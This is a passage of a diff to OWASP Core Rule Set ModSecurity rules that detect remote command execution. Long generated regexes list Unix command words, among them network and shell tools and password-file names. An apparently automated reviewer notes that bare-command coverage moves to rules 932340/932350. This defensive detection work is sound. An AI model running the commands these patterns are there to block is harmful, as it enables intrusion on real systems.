\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[
\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0
b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|[\s\x0b&\),<>\|].*))\b" \ "id:932232,\ phase:2,\ block,\ @@ -1764,7 +1844,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1780,6 +1860,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, 
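Review bot: On the new side of the 932232 regex the trailing `(?:[\s\x0b&\),<>\|]|$).*` groups become `[\s\x0b&\),<>\|].*`, so a command word that ends the parameter value (no separator, no argument) no longer matches this PL3 rule; the comment list added in `@@ -1780,6 +1860,8 @@` names 932340/932350 as the rules that now cover commands with no arguments, but nothing in this hunk records that the coverage moved. Since the rule text is generated (`crs-toolchain regex update 932232` in the context lines above the rule), the intent belongs in the hand-written part: I would extend the comment block above the rule with `# Commands with no arguments (command word at end of input) are no longer matched here; see 932350.`, and if the regression tests for 932232 include a bare command at end of input, move them to the 932350 tests rather than drop them. The same `|$` removal appears in the 932239 regex above and the 932237 regex below, which should carry the equivalent note.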
@@ -1805,7 +1887,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932237 # -SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)\b(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|(?:(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)(?:[\s\x0b&\),<>\|]|$)|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get|itude(?:[\s\x0b&\),<>\|]|$))|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|t(?:[\s\x0b&\),<>\|]|$|obm(?:[\s\x0b&\),<>\|]|$))|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|io(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:t(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|on(?:[\s\x0b&\),<>\|]|$|tab)))|d(?
:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)(?:[\s\x0b&\),<>\|]|$)|nf(?:[\s\x0b&\),<>\|]|$)?|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:[bd]|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|le(?:[\s\x0b&\),<>\|]|$|test)|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:(?:d|rb|conv|nstall)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|ava|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s
\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke|wk)(?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|[qx](?:[\s\x0b&\),<>\|]|$))|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:(?:re|unt)(?:[\s\x0b&\),<>\|]|$)|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|cman|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|hp(?:[\s\x0b&\),<>\|]|$|-cgi|[57](?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|s(?:[\s\x0b&\),<>\|]|$|(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|
$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|name|p(?:eat|lace))(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|h(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|sk(?:[\s\x0b&\),<>\|]|$|set))|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|me(?:[\s\x0b&\),<>\|]|$|datectl|out(?:[\s\x0b&\),<>\|]|$)))|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:ame|compress
|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:[\s\x0b&\),<>\|]|$|m(?:[\s\x0b&\),<>\|]|$|diff)|(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:[\s\x0b&\),<>\|]|$|(?:c|a(?:ll|tch))(?:[\s\x0b&\),<>\|]|$)|h(?:o(?:[\s\x0b&\),<>\|]|$|ami|is(?:[\s\x0b&\),<>\|]|$))?|iptail(?:[\s\x0b&\),<>\|]|$))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))(?:\b|[^0-9A-Z_a-z])" \ +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx 
(?i)\b(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|t(?:obm)?|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\),<>\|]|p(?:t(?:(?:itude)?[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h?[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:t[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|nf[\s\x0b&\),<>\|]?|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>
\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:(?:re|unt)[\s\x0b&\),<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|